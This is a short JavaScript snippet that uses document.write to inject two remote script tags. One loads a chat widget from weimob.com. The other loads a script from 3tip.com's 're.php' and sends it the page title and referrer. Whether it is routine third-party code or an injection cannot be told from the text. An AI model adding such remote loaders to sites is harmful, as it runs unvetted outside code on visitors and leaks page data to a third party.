document.write("<script language='javascript' src='http://kf.weimob.com/js/ChatFloat.js?_veri=20121009'><\/script>");document.write("<script language='javascript' src='http://js.3tip.com/re/re.php?src=t6401&t="+encodeURIComponent(document.title)+"&ci=3079961231&r="+encodeURIComponent(document.referrer)+"'><\/script>");

